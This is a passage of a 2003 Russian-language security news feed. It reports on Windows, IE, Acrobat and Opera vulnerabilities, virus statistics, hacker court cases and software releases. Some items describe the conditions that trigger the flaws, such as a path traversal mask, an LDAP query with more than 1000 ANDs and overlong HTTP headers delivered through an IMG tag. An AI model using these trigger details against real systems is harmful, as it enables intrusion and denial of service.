Не добившись от софтверного гиганта никаких уступок, группа хакеров опубликовала ПО, якобы лишающее Xbox всех степеней защиты. Так называемая группа Free-X утверждает, что ей удалось преодолеть все уровни защиты игровой консоли без каких-либо модификаций аппаратуры, чем навлекла на себя резкую критику со стороны Microsoft. Free-X утверждает также, что соответствующий эксплойт уже разослан через список рассылки. Члены группы рассказали ZDNet Australia, что Free-X честно пыталась договориться с Microsoft и просила выпустить загрузчик Linux с цифровой подписью, позволяющий владельцам Xbox исполнять операционную систему с открытым исходным кодом без каких-либо модификаций аппаратуры и вскрытия консоли. Microsoft не вступила в переговоры. Представители группы отвергают обвинения в потворстве пиратам и в свою очередь обвиняют компанию в отказе защитить интеллектуальную собственность разработчиков игры. По их словам, загрузчик с цифровой подписью не позволил бы использовать консоль для пиратских игр, а тот, что разработала Free-X, — позволяет. Free-X утверждает, что у нее нет намерения способствовать пиратству. «Если бы Microsoft согласилась на Linux с цифровой подписью... нелегальное использование пиратского ПО можно было бы предотвратить, — говорится в заявлении Free-X. — Жаль, что Microsoft не разделяет нашего беспокойства по поводу защиты прав интеллектуальной собственности тех, кто разрабатывает ПО для их консоли». Microsoft, которая очень далека от того, чтобы признать деятельность группы антипиратской, обрушилась на нее с резкой критикой. «К вашему и этих... типов сведению, отделение Microsoft Xbox очень серьезно относится к пиратству видеоигр, — сообщила ZDNet Australia по e-mail представительница Microsoft. — Защита интеллектуальной собственности и авторских прав – наших и наших партнеров — высший приоритет для нас, и мы оставляем за собой право преследовать каждого и принимать меры против каждого, кто способствует пиратству видеоигр». Подробности - http://www.zdnet.ru/?ID=303266
5/07/2003 16:07 Уязвимость в Windows 2000 - 2 и 3.
После выхода 4-го сервис-пака для Win2K начали появляться подробности об уязвимостях, которые, собственно, и устраняет этот самый SP4. Так, Core Security Technologies со штаб-квартирой в Бостоне (Массачусетс, США) опубликовала вслед за японскими коллегами сообщения о наличии уязвимости в двух других компонентах (сервисах) Win2K. Первая уязвимость обнаружена в сервисе Active Directory, на котором, собственно, и строится вся система безопасности сети Windows c централизованным сервером. Сам сервис построен на базе протокола LDAP (Lightweight Directory Access Protocol). Было обнаружено, что при посылке серверу пакета 'search request' по протоколу LDAP версии 3, который содержит более 1000 операторов "AND", происходит переполнение стека с последующей перезагрузкой сервера (рушится процесс Lsass.exe). При проведении длительной бомбардировки подобными пакетами возникают условия для DoS, так как может быть вызвана циклическая перезарузка сервера. В письме приведён пример эксплоита на Питоне. Вторая уязвимость обнаружена в популярном сервисе NetMeeting, при помощи которого группа пользователей может аудио- и видео-конференции, а также обмениваться файлами. В возможности обмена файлами ("File Transfer") как раз и заключена уязвимость, которая позволяет, используя маску пути "..\..\" сохранить произвольный файл в произвольном месте файловой системы ОС (а не в предусмотренном C:\Program Files\Received\Received Files), что может создать условия для внедрения вредоносного кода с его дальнейшим запуском. Обе уязвимости устранены тем самым SP4, а вторая также устранена в ОС WinXP 1-м сервис-паком. Первая уязвимость - http://www.coresecurity.com/common/showdoc.php?idx=351&idxseccion=10 Вторая - http://www.coresecurity.com/common/showdoc.php?idx=352&idxseccion=10
5/07/2003 15:59 Уязвимость в Windows 2000.
Господа из японской Computer Security Laboratory предали гласности информацию об уязвимости в операционной системе Windows 2000. В частности, уязвимость обнаружена в функции ShellExecute() из модуля SHELL32.DLL Version 5.0.3502.6144. Эта функция связана с запуском приложений, связанных с определённым расширением файла. Если в качестве 3-го аргумента этой функции используется указатель на очень длиннную строку, возникает возможность выполнения переполнения буфера с дальнейшим нарушением функционирования сервера под управлением ОС. Информация была предана гласности в связи с тем, что в вышедшем недавно 4-м сервис-паке для ОС Win2K уязвимость устранена. Подробности - http://www.lac.co.jp/security/intelligence/SNSAdvisory/65.html
5/07/2003 15:32 Руководство по установке IPFW2.
Благодаря Rend с форума RTFM сайта www.sysadmins.ru, обнаружена довольно любопытная ссылка на документ, в котором автор, Michael Oliver, описывает процесс компиляции, настройки и конфигурирования новой версии фильтра пакетов операционной системы FreeBSD - IPFW2 в версии 4.7-RELEASE. Cтатья - http://michael.gargantuan.com/FreeBSD/ipfw2.htm
5/07/2003 15:02 Суперкомпьютер против хакеров.
Как сообщает SYSADMINS.RU, в надежде противостоять хакерам, военные запускают новый исследовательский проект в University of Illinois, чтобы улучшить защиту военных компьютеров и систем связи. Официальные представители National Center for Supercomputing Applications объявили в четверг о размере начального финансирования проекта - 5.7 миллионов долларов. Деньги выделены Office of Naval Research. Новый вычислительный центр, по словам директора NCSA Дэна Рида, будет развивать технологию защиты от атак вражеских хакеров. Видимо это навеяно слухами о существовании военных хакерских организаций, которые только и ждут момента, чтобы угробить Америку. Другие научно-исследовательские работы центра будут направлены на совершенствование технологий для ведения боя. Например, удалённое управление боевыми единицами. NCSA, расположенный в университетском городке Urbana-Champaign, является мощным вычислительным центром, который занимается развитием "тяжелых" информационных технологий для правительство и промышленности. Подробности - http://www.usatoday.com/tech/news/2003-07-03-ncsa-center_x.htm
5/07/2003 14:55 Выход новой версии "Антивируса Касперского" Personal и Personal Pro.
"Лаборатория Касперского" сообщает о выпуске и начале продаж новой версии популярных антивирусных продуктов, предназначенных для обеспечения полномасштабной защиты персональных компьютеров - Антивируса Касперского® Personal 4.5 и Антивируса Касперского® Personal Pro 4.5. По сравнению с предшественниками, Антивирус Касперского® Personal и Personal Pro 4.5 заключают в себе ряд технологических изменений, значительно повышающих производительность программ и расширяющих их функциональность. Одним из основных отличий усовершенствованной версии Антивируса Касперского® Personal и Personal Pro является включение в программу передовой разработки "Лаборатории Касперского" - технологии iChecker™. При помощи этой технологии программа производит антивирусную проверку только тех файлов, которые подверглись изменениям, что существенно повышает эффективность сканирования файловой системы. Основным рабочим компонентом iChecker™ является специальная база данных, в которой хранятся контрольные суммы всех проверенных незараженных файлов. При запуске Антивирус Касперского® осуществляет сравнение контрольной суммы файла с данными, хранящимися в базе. Совпадение данных означает, что файл был проверен и повторная проверка не требуется. При этом время, затрачиваемое на подсчет контрольных сумм файлов, значительно меньше, чем время антивирусной проверки. Подробнее - http://www.kaspersky.ru/news.html?id=1311712
4/07/2003 14:44 Подробности переполнения буфера в URLMON.DLL.
В конце апреля Microsoft выпустила предупреждение об уязвимости в URLMON.DLL, которая используется множеством приложений (Internet Explorer, Outlook и другие). Удаленный атакующий может выполнить произвольный код на системе с привилегиями текущего пользователя. Переполнение буфера происходит, когда программа, использующая уязвимую DLL, получает HTTP ответ с чрезмерно длинным значением полей "Content-type" и "Content-encoding". Эксплуатируя эту уязвимость, атакующий может запустить произвольный код на компьютере жертвы, при просмотре злонамеренной страницы или HTML почтового сообщения. Для эксплуатации уязвимости в Outlook достаточно предварительного просмотра злонамеренного сообщения. Для успешной эксплуатации не требуется сценария, ActiveX или чтолибо типа IFRAME – достаточно только тэга IMG, т.е. установки зоны безопасности никак не вляют на обнаруженную уязвимость. Для успешной эксплуатации уязвимости по различным причинам может использоваться только тэг IMG. Если злонамеренный HTTP ответ идет с нормальным HTML документом, Internet Explorer зависнет или завершит работу без каких либо предупреждений. Если требования выполнены (оба поля заголовка содержат значения правильных размеров и используется тэг IMG), уязвимость сводится к тривиальной эксплуатации переполнения стека. Адрес возврата может быть перезаписан значением "Content-encoding" размером около 300 байт. Подробности - http://securitylab.ru/default.asp?ID=38708
4/07/2003 13:09 Линус Торвальдс: бета-версия Linux 2.6 на подходе.
Лидер движения Linux не сдержал обещания выпустить версию 2.6 операционной системы Linux в июне, но уверяет, что тестовая версия может появиться уже на будущей неделе. «Я планирую начать так называемую серию pre-2.6 в начале июля, и она будет играть роль бета-серии», — сказал Торвальдс в среду в интервью. Он и Эндрю Мортон, программист, который будет мейнтейнером версии 2.6, «договариваются о начале серии pre-2.6 на будущей неделе». «Вероятнее всего, что реальная версия 2.6.0 выйдет через несколько месяцев после этого, — сказал Торвальдс. — И, как обычно, это будет еще не конец. На то, чтобы поставщики полностью переключились на новую версию, требуется, как правило, полгода». В июне руководители IBM говорили, что компания планирует выпустить продукты с ядром 2.6 в первом полугодии 2004 года. До этого они надеялись сделать это во втором полугодии текущего года. В октябре прошлого года Торвальдс говорил, что он планирует завершить версию 2.6 к июню. Теперь он более осторожен в своих прогнозах. «Schedules schmedules. Да, я как всегда опоздал», — отшучивается он. Подробности - http://news.com.com/2100-1016_3-1023130.html?tag=fd_top
4/07/2003 12:54 Defacers Challenge не угрожает безопасности Интернета.
Эксперты по компьютерной безопасности призывают пользователей Интернета не паниковать и спокойно относиться к очередному хакерскому соревнованию Defacers Challenge, суть которого состоит в том, чтобы как можно быстрее и больше взломать веб-сервера и веб-страницы частных компаний и государственных организаций. Напомним, что несколько дней назад компания Internet Security Systems (ISS) распространила в прессе предупреждение о возможной опасности и риске взламывания веб-страниц, в связи с предстоящим хакерским соревнованием Defacers Challenge. «Международное хакерское соревнование по взламыванию сайтов должно начаться в воскресенье и принесет немало головной боли компаниям и организациям, которые станут объектом хакерских атак. Более того, Defacers Challenge может помешать работы всего Интернета в целом, - говорилось заявлении ISS. Согласно условиям, которые описаны на официальном сайте соревнования www.defacers-challenge.com, победителем соревнование станет тот хакер, которому удастся взломать более 6000 сайтов за рекордно короткие сроки. К сожалению, более детально ознакомиться с условиями соревнования специалистам не удалось, поскольку сайт Defacers Challenge уже в четверг был недоступен для пользователей и отключен провайдером Affinity Internet, который предоставлял сайту услуги хостинга. Как заявила журналистам пресс-секретарь Affinity Internet, сайту было отказано в обслуживании по причине нарушения условий контракта, который, впрочем, пресс секретарь отказалась назвать. Подробнее - http://www.internet.ru/mainnews/n_0w62.esp
4/07/2003 12:33 eBay с легкостью раскрывает данные о своих клиентах.
Неожиданностью стало заявление директора по безопасности компании eBay Джозефа Салливана по поводу политики аукциона относительно приватности. Как выяснилось, узнать конфиденциальную информацию об участниках торгов не так сложно. Салливан в интервью TheNation заявил: "Представителям служб безопасности достаточно направить нам по факсу запрос на получение данных о любом клиенте аукциона, указав только его регистрационный номер, и мы отправим им его имя, адрес, историю продаж и другую личную информацию. Для этого даже не потребуется решения суда". Интересно, как отреагируют на высказывание Салливана десятки миллионов клиентов системы PayPal, к счетам которых имеет доступ eBay. В свете последних проблем с утечкой личной информации такие слова одного из представителей руководства компании могут дорого обойтись. Источник - http://www.runet.ru
4/07/2003 11:18 Турецкий хакер обворовал Нижний Новгород на 30 тыс.рублей.
Взломом компьютерной сети одного из вычислительных центров города ответил турок приютившему его на 10 лет Нижнему Новгороду. Городской суд принял к рассмотрению уголовное дело по факту незаконного использования интернет-ресурса нижегородской фирмы-провайдера студентом из Турции, обучающемся в нижегородском инженерно-строительном университете. Турок, уже 10 лет проживающий в Нижнем Новгороде в студенческом общежитии, проник в базу данных "Нижегородский вычислительный центр" и в течение 7 месяцев незаконно использовал резервный адрес фирмы, нанеся ей материальный ущерб в размере 30 тыс. рублей. Как сообщает ИТАР-ТАСС, по данному факту возбуждено уголовное дело по статьям, которые грозят штрафами в размере от 400 до 800 минимальных размеров оплаты труда, исправительными работами или лишением свободы от 2 до 5 лет. Гражданин Турции признал свою вину и уже возместил финансовые потери пострадавшей фирме. Источник - http://www.itar-tass.com
4/07/2003 10:57 Спам от ALC - найден исполнитель.
Журналистам сайтов Runet.ru и PROext.com удалось выследить компанию-исполнителя рассылок в изрядно доставшем всех рунетчиков "деле" о спаме от "Центра Американского Английского". На одной из страниц (http://inforeklam.ru/primer/17/) веб-представительства интернет-агентства InfoReklam желающие могут обнаружить пример того самого, уже снящегося кое-кому в кошмарах спама ALC. Насколько удалось выяснить работникам Runet.ru и PROext.com, компания InfoReklam какой-либо вины за собой не видит и заявляет себя в качестве "безобидного" посредника между своими заказчиками и конечными получателями рекламы. При этом, самый масштабный мэйл-лист InfoReklam состоит из 5 млн. адресов электронной почты пользователей Рунета. Видимо, история с ALC - это лишь начало. Источник - http://www.viruslist.ru
3/07/2003 17:05 Соревнование хакеров может нарушить работу интернета.
Эксперты по компьютерной безопасности предупреждают о том, что в скором времени в Сети состоится состязание хакеров по скоростному взлому веб-сайтов. По информации агентства AP, состязание стартует в это воскресенье. Главной задачей участников станет взлом веб-сайтов с подменой заглавных страниц (defacement). Победит та хакерская команда, которая быстрее всех сумеет взломать 6000 сайтов. Кроме состязания на время, будет вестись и учет баллов - за взлом более защищенных серверов полагается больше очков. Приз за победу в состязании достаточно скромен - 500 Мб дискового пространства в интернете. Этого недостаточно даже для размещения одного образа компакт-диска. Впрочем, победа в состязании может оказаться ценной с точки зрения престижа. О состязании было объявлено на специально созданном сайте defacers-challenge.com, который был закрыт в среду вечером за нарушение условий договора с провайдером. Отношение к готовящемуся состязанию среди экспертов неоднозначное. Например, в министерстве внутренней безопасности США считают, что это состязание не стоит того, чтобы выпускать специальные предупреждения. "Честно говоря, хакерские состязания проводятся часто, и мы не думаем, что все они поднимаются до такого уровня, когда требуется оглашать предупреждения об опасности", - пояснил представитель министерства Дэвид Рэй. С другой стороны, ряд компаний, специализирующихся на проблемах безопасности, выпустили свои предостережения. Кроме того, по данным этих компаний, в последние дни наметилось снижение числа взломов, зато хакеры начали активно сканировать Сеть на предмет обнаружения уязвимых сайтов. Это свидетельствует о большом интересе хакеров к соревнованию. Все это может привести к тому, что одновременно будут предприняты тысячи попыток взлома, что вполне может нарушить работу некоторых сегментов Сети. Источник - http://www.compulenta.ru
3/07/2003 16:53 Хакеры шантажируют Microsoft.
Группа хакеров обратилась к корпорации Microsoft с требованием обеспечить официальный выпуск дистрибутива Linux для приставки Xbox. Из-за наличия у этой приставки аппаратной защиты для нее нельзя выпустить ни одной программы без цифровой подписи Microsoft. Поэтому единственным легальным способом запустить Linux на Xbox является выпуск соответствующего дистрибутива под эгидой Microsoft. Софтверный гигант, впрочем не спешит выполнять эти требования. Чтобы дать компании стимул к выпуску официального дистрибутива Linux для Xbox, хакеры пригрозили публичным разглашением тайн системы защиты приставки, например, ключей для подписи ПО. Это, по их словам, грозит настоящим разгулом пиратства, который Microsoft сможет предотвратить, просто разрешив выпуск Linux для Xbox. О реакции Microsoft на подобный ультиматум пока ничего неизвестно. Что касается запуска Linux на Xbox, то он давно осуществлен энтузиастами в рамках проекта Xbox Linux. Подроности - http://news.zdnet.co.uk/story/0,,t269-s2136730,00.html
3/07/2003 15:48 OSDL нанимает еще одного Linux-гуру.
Международный консорциум ведущих технологических компаний (Open-Source Development Lab – OSDL), созданный для ускорения принятия Linux, сообщил о привлечении Эндрю Мортона (Andrew Morton) к работе над версией 2.6 ядра на все время её поддержки. Мортон является одним из главных специалистов, занимающихся поддержкой ядра Linux, помимо своей основной работы в качестве ведущего инженера компании Digeo. В новой роли Мортон посвятит себя поддержке выпуска ядра, в то время как создатель ОС Торвальдс будет заниматься поддержкой его разработки. Как руководитель выпуска ядра Linux, Мортон будет тесно общаться с Торвальдсом, специалистами по поддержке различных подсистем ядра, дистрибьюторами, производителями аппаратной части и другими важными партнерами, чтобы гарантировать, что выпущенное ядро соответствует их нуждам. Кроме того, он будет гарантировать стабильность и производительность при работе ядра, а также выносить окончательное решение по техническим и деловым проблемам при включении патчей в выпускаемое ядро. На своем последнем месте работы в Digeo в роли ведущего инженера Эндрю Мортон являлся главным архитектором Linux-решений, являющихся основным программным компонентом выпускаемого компанией Moxi Media Center. Подробности - http://www.cnews.ru/
2/07/2003 17:32 .UA-нет снова лихорадит.
Как пишет internet.ru, украинские интернетчики обеспокоены новым законопроектом "О деятельности в сфере информатизации", который вынесен на рассмотрение украинского парламента - Верховной Рады. Законопроект вводит понятие "объект информатизации", под которым понимаются "информационные технологии, продукты, ресурсы", а деятельность объекта информатизации может быть "ограничена" в ряде случаев, например, в случае, если объект информатизации нарушит принципы "достоверности, полноты и своевременности информации, которая предоставляется пользователю". По мнению соиздателя украинского интернет-издания Uatoday.net Сергея Моругина, в случае, если этот закон будет принят Верховной Радой, в Украине может сложиться критическая ситуация с интернет-изданиями. "Я говорил со многими моими коллегами, они обеспокоены. Мы уже обсуждаем с ними в какую страну переносить свои серверы", - сказал Сергей Моругин. По его словам "этот законопроект затрагивает отрасль в целом, поскольку он предусматривает уничножение самого понятия СМИ в Интернете и низводит нас до уровня каких-то "информатизаторов". Как отметил Сергей Моругин, сейчас представителями большинства украинских интернет-изданий готовятся акции протеста: "Мы готовим пресс-конференцию, а кроме того, несколько акций протеста. Например, есть идея учредить "Черный список врагов УАнета, в который внести фамилии всех депутатов, которые проголосуют за этот законопроект". Как известно, на сегодняшний день интернет-СМИ в Украине не подлежат регистрации и их деятельность не урегулирована законодательно. Законопроект - http://oracle2.rada.gov.ua/pls/zweb/webproc34?id=&pf3511=14097&pf35401=29229
2/07/2003 17:04 Уязвимость в Adobe Acrobat Reader.
Ребята из польской команды Sec-Labs оповестили мировое секьюрити сообщество о существовании уязвимости в популярном вьювере PDF-файлов Adobe Acrobat Reader. Возможность переполнения буфера в функции WWWLaunchNetscape позволяет выполнить произвольный код в системе с полномочиями пользвателя, от имени которого запущен Adobe Acrobat. Переполнение может быть вызвано при передаче адреса ссылки в буфер, длина которого ограничена 256 байтами. Однако, замечают авторы, для выполнения переполнения необходимо убедить пользователя нажать на адрес ссылки, а также, чтобы в качестве браузера по умолчания был выбран Netscape (что обычно задано по умолчанию). Уязвимость обнаружена в версиях до 5.0.7. Для платформ Windows и Mac существует версия 6.0, однако для платформ UNIX крайней является именно 5.0.7. Выпущен эксплоит, который не содержит деструктивных функций, а просто демонстрирует возможность перезаписи адреса возврата. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-07/0010.html
2/07/2003 16:06 Уязвимость в браузере Opera.
Господин nesumin из Японии опубликовал 5 примеров кода, который может быть помещён на Вэб-страничку для выведения из строя новой версии браузера Opera. В результате выполнения каждого из этих кодов происходит DoS и браузер рушится, в некоторых случаях загрузка процессора достигает 100%, что требует перезагрузки. Для того, чтобы DoS не произошло, в некотрых случаях помогает отключение JavaScript, в последнем (пятом) случае помогает отключение "CSS Author mode". Природа уязвимости автором не раскрывается. Производитель, Opera Software ASA, на обращение автора уязвимости не ответили. Были протестированы версии Opera: 7.03 build 2670, 7.10 build 2840, 7.11 build 2880, 7.11b build 2887 на ОС - Windows 98SE Japanese Edition и Windows 2000 Pro SP3 Japanese Edition. Подробности и коды - http://archives.neohapsis.com/archives/bugtraq/2003-07/0008.html
2/07/2003 15:49 Эксплоит для Internet Explorer >=5.0.
На прошлой неделе Digital Scream обнаружил возможность удаленного переполнения буфера в Internet Explorer. ЗАРАЗА выпустил PoC эксплоит, который демонстрирует возможность успешной эксплуатации обнаруженной уязвимости. ЗАРАЗА опубликовал код, эксплуатирующий недавно обнаруженное переполнение буфера в HTML32.cnv в Microsoft Internet Explorer. Выпущенный эксплоит срабатывает с вероятностью ~70 % на на Windows NT 4.0 системах. Как сообщает ЗАРАЗА, эксплоит делает только ExitProcess (0x3A3A). Еще предупреждается, что выполнение эксплоита может занять несколько минут. Подробности работы эксплоита читайте в источнике сообщения. Уязвимость была проверена на WinNT 4.0 SP6a, IE 6.0.2800, msvcrt.dll 6.10.8924.0. Подробности - http://securitylab.ru/default.asp?ID=38675
2/07/2003 15:27 Пентагон создает глобальную систему слежения.
В недрах Пентагона разрабатывается принципиально новая система глобального слежения - тысячи компьютеров и камер смогут в городах мира наблюдать, записывать и анализировать передвижение буквально каждого транспортного средства, сообщает АР. Проект получил название "Всевидящие боевые зоны" и призван помочь защитить американские войска от внезапных нападений в иностранных населенных пунктах. Однако многие ученые и эксперты опасаются, что новая система легко может быть адаптирована для слежения за собственными гражданами в США. В рамках проекта создается специальная компьютерная программа, которая будет автоматически определять транспортное средство по размеру, цвету, номеру, а водителя и пассажиров - по лицу. Заметив подозрительные объекты (например, номерной знак, занесенный в "черный список"), система будет передавать сигнал тревоги. Проект сейчас рассматривается Управлением перспективных разработок Пентагона - ведомством, под контролем которого разрабатываются новые технологии. В ходе развития программы будут созданы базы данных на тысячи подозреваемых лиц, куда будут занесены цвет волос, овал лица, разрез глаз, форма ушей и т.д. По этим признакам компьютер сможет определить местоположение террористов. Источник - http://www.rbc.ru/
2/07/2003 15:15 .NET Passport - уязвимость в "секретном вопросе".
В сообществе специалистов по информационной безопасности сейчас широко обсуждается обнаруженая на днях уязвимость в учетных записях сервиса Microsoft .NET Passport, в результате использования которой злоумышленник может изменить пароль и получить доступ к чужим данным. Уязвимость обнаружена в коде, обрабатывающем запросы пользователей, забывших свои пароли и пытающихся восстановить их с помощью "секретного вопроса". Как оказалось, этот код некорректно работает с учетными записями, заведенными до внедрения этой услуги. Для совершения злонамеренных действий мошенник должен знать адрес электронной почты и страну проживания жертвы. Представители Microsoft не были доступны для дачи комментариев. Сервисом .NET Passport пользуются примерно 200 млн. человек. В мае текущего года уже обсуждалась уязвимость сервиса, при которой злоумышленик мог получить высылаемый службой поддержки обновленный пароль доступа на подставной ящик электронной почты. Тогда эта проблема получила широкую огласку из-за того, что служба поддержки Microsoft не реагировала на запросы пользователей и исправила баг только после его публичного освещения. Источник - http://www.computerweekly.com/
2/07/2003 15:01 Обзор вирусной активности за июнь от "Лаборатории Касперского".
Свой хит-парад вирусов июня опубликовала также "Лаборатория Касперского". Согласно ему, на первом месте находится червь Lentin с 32,48% вирусных инцидентов, на втором - знаменитый Klez c 17,69%, на третьем - Tanatos c 16,97%. Вот такие вот разные хит-парады. Подробности - http://www.viruslist.com/index.html?tnews=1007&id=2542360
2/07/2003 14:46 Десятка вирусов, наиболее часто обнаруживаемых в июне.
В июне ‘B’ вариант червя Bugbear возглавил десятку самых популярных вирусов, обнаруженных программой Panda ActiveScan. Он обогнал Klez.I, который сохранял позицию лидера начиная с апреля 2002 года. По данным, собранным программой Panda ActiveScan, червь Bugbear.B ответственен примерно за 18% случаев вирусных заражений, на долю Trj/PSW.Bugbear.B приходится 11,19%, Mapson – 6.78%, Klez.I – 4.33% и Bugbear – 3,9%. Список замыкают Parite.B, Fornight.D, Enerkaz, NoClose и Bugbear.B.Dam. Наиболее примечательным событием этого месяца, безусловно, является преобладание в десятке представителей семейства Bugbear: - Bugbear.B, вытеснивший Klez.I с первого на четвертое место. Начиная с апреля 2002 года Klez.I лишь несколько раз сдавал позиции лидера, виновником чему был предшественник Bugbear. - Высокий процент компьютеров, зараженных Bugbear.B и PSW.Bugbear.B (17.78% и 11.19%) значительно превышает процент компьютеров, зараженных другими вирусами, занимающими первые места десятки (около 10%). - Четыре из десяти наиболее опасных вредоносных кодов принадлежат семейству Bugbear (включая – Bugbear.B.Dam – поврежденные копии Bugbear.B). Хочется отметить также наличие в десятке червя Mapson, впервые появившегося в середине июня, и отсутствие Nimda. Источник - http://www.viruslab.ru
2/07/2003 14:34 Казахский хакер отделался легким испугом.
Житель Алма-Аты, гражданин России Олег Зезев, осужденный в Манхэттене за взлом компьютерной сети агентства финансовых новостей Bloomberg и попытку шантажировать его владельца - нынешнего мэра Нью-Йорка Майкла Блумберга - приговорен к четырем годам и трем месяцам лишения свободы. Однако, по словам адвоката Роберта Баума, реально это значит, что он выйдет на свободу через 7 месяцев. Подельнику Зезова, юристу Игорю Яримака, удалось и вовсе избежать наказания. Суд также назначил сумму компенсации, которую Зезев должен будет выплатить пострадавшему миллиардеру: почти $955 тысяч. Интересно, что официальная зарплата Зезева в Алма-Ате составляла $500 в месяц. "Я написал судье, - со смехом сказал Би-би-си Баум, - что если Зезев будет отдавать всю свою зарплату, то он расплатится лишь через 159 лет". На самом деле Блумберг вряд ли сможет взыскать даже цент. Олег Зезов был арестован три года назад, когда он работал в Алма-Ате в крупной инвестиционной компании, которая некоторое время была клиентом Bloomberg. Проведенного там времени Зезову хватило, чтобы проникнуть в систему американской корпорации и добраться до скрытых файлов. Весной 1999 года он отправил Майклу Блумбергу несколько писем, которые доказывали, что у хакера есть доступ ко многим корпоративным документам, в частности, к распечаткам транзакций со счетов самого Блумберга. Зезов просил у Блумберга $200 тысяч за рассказ о том, как можно пробраться в корпоративную сеть. Блумберг сделал вид, что согласился, перевел часть денег на счет в Лондоне, пригласил в британскую столицу самого вымогателя и рассказал обо всем полиции. 10 августа 2000 года Зезов, сопровождаемый юристом Игорем Яримакой, встретился с Блумбергом и его людьми в лондонском отеле "Хилтон". Среди сопровождавших нынешнего мэра Нью-Йорка были и переодетые полицейские, которые и арестовали Зезова и Яримаку. Встреча гостей из Алма-Аты с Блумбергом снималась скрытой камерой и фигурировала на суде как главная улика. Впоследствии обвиняемые были экстрадированы из Великобритании в США. После того, как судья отказалась приобщить к материалам дела большую часть компромата, собранного следственными органами, прокуратура решила не судить Игоря Яримаку. Он еще в марте уехал в Россию, в Ростов-на-Дону, где проживают его родители. Источник - http://www.cnws.ru
1/07/2003 15:55 О системе "Эшелон".
В списке рассылки "Актуальные события глазами контрразведчика", которую ведёт на сервере рассылок Subscribe.ru господин Олександр Зленко, опубликован довольно любопытный материал, касающийся истории и описания небезызвестной системы тотального контроля над телекоммуникациями "Эшелон". Следует сразу оговориться, что автор (в силу специфики своей прошлой работы) в основном описывает расположение базовых наземных станций слежения и расположение спутниковой группировки системы, при этом абсолютно упустив из виду компьютерную составляющую этой системы. Тем не менее, описание истории и структуры системы "Эшелон" довольно любопытно. Подробности - http://subscribe.ru/archive/media.news.review.spy33analitika/200306/30184532.html
1/07/2003 14:45 Выпуск Nmap 3.30.
На сайте проекта NMAP - www.insecure.org ссобщается о выпуске очередного релиза самого популярного сканера NMAP - 3.30. Включены новые слепки (fingerprints) различных версий ОС - OpenBSD 3.3, FreeBSD 5.1, Mac OS X 10.2.6, Windows 2003 server, различные WAP-роутеры. Добавлена новая классификация сканируемой ОС - помимо названия производителя (SUN, IBM etc.), название ОС (например, Solaris или SunOS), релиз этой ОС, а также тип установки (рабочая станция, игровая консоль и т.д.) и другие улучшения несомненно лучшего сетевого сканера. Подробности - http://www.insecure.org/nmap/nmap_changelog.html
1/07/2003 14:33 Хакеры в законе.
Частные компании и государственные организации должны будут информировать потребителей о хакерских атаках, которые могли привести к краже номеров карт социального страхования, водительских прав, кредиток и другой приватной информации. Таковы требования нового законопроекта, предложенного на рассмотрение Сената США. Законопроект представлен Дианой Фейнштейн (Dianne Feinstein) – сенатором от штата Калифорния, где аналогичный закон был принят несколько дней назад. В отличие от последнего, общефедеральный закон более гибок и не предусматривает права потребителей возбуждать против компаний судебные иски. Предложения калифорнийского сенатора прямо противоположны обещаниям администрации Буша обеспечить неразглашение информации о жертвах хакерских атак, чтобы стимулировать их сотрудничество с ФБР и другими спецслужбами Источник - http://www.securitylab.ru
1/07/2003 14:31 В новом веке славу Трансильвании преумножает не Дракула, а кибер-гангстеры.
Румынские хакеры с родины великого и ужасного Дракулы попили крови у важных американских компаний. «Кибер-террористы» из Трансильвании взламывали базы данных и требовали за полученные сведения 50 тысяч долларов. Румыния никогда не была в авангарде hi-tech революции, а средневековый трансильванский город Сибиу вряд ли можно назвать сердцем дерзких хакерских операций. Это место более всего известно, как месторождения графа Влада Дракулы Закалывателя, который и стал прототипом вампира из легенд. Однако факт остается фактом. Схема действий «кибер-террористов» (как их назвали в ФБР) из Сибиу была достаточна проста: они взламывают сервер большой американской компании, получают доступ к защищаемой базе данных, скачивают персональные клиентские файлы и затем смело требуют 50 000 за то, что не станут публиковать конфиденциальные сведения в Интернете. Выходка дерзких хакеров не осталась без должного внимания. Чтобы выследить шантажистов, корпорации обратились за помощью в Федеральное Бюро Расследования. Имена пострадавших компаний не разглашаются в целях предотвращения паники среди клиентов. Два месяца длилась тонко разработанная операция по аресту злоумышленников. На прошлой неделе начальник по борьбе с организованной преступностью и незаконным оборотом наркотиков в Румынии назвал имена кибер-террористов . Группу из 6 человек возглавлял бывший ученик средней школы 21-летний Стефан Олару. Подробности - http://www.runet.ru/news/3340.html
1/07/2003 14:15 В РФ введены новые санитарные нормы по работе с ПК.
Оборудование рабочего места у компьютера должно подчиняться не только требованием эстетического вкуса, а и строгим предписаниям санитарных служб. С 30 июня 2003 года в России актуализируются новые требования к электронно-вычислительной и офисной технике, а также к организации работы с подобной аппаратурой. Несмотря на то, что выполнение данных требований редко предается проверке, прислушаться к мнению специалистов стоит. Согласно постановлению Главного государственного санитарного врача от 3 июня 2003 года (САНПИН 2.2.2/2.4.1340-03), площадь на одно рабочее место пользователя ПЭВМ с видеодисплейным терминалом на базе электронно-лучевой трубки должна составлять не менее 6 кв.м. При этом соседние компьютеры должны находиться на расстоянии не менее метра один от другого. Также, введены строгие ограничения на работу за компьютером беременных женщин и лиц моложе 18 лет. Источник - http://www.runet.ru
1/07/2003 14:04 Минсвязи предупреждает: домен в зоне .su опасен.
Министерство РФ по связи и информатизации рекомендует пользователям сети Интернет регистрировать новые доменные имена в зоне .ru а не .su, сообщает ИТАР-ТАСС со ссылкой на первого замминистра РФ по связи и информатизации РФ Андрея Короткова. Замминистра также добавил, что никаких мер по запрещению регистрации доменов в зоне .su принято не будет. По словам Короткова, доменная зона не поддерживается партнерами Минсвязи в Региональном содружестве в области связи и международными организациями. В своем заявлении замминистра сравнил открытие регистрации в зоне .su с организацией новой "финансовой пирамиды", "в результате которой могут пострадать тысячи доверчивых пользователей Интернета". По статистике Минсвязи РФ, ресурсы зоны .ru в настоящее время используется лишь на 20%. Источник - http://www.lenta.ru
1/07/2003 13:54 Выход двух новых версий браузеров: Mozilla 1.4 и Netscape 7.1.
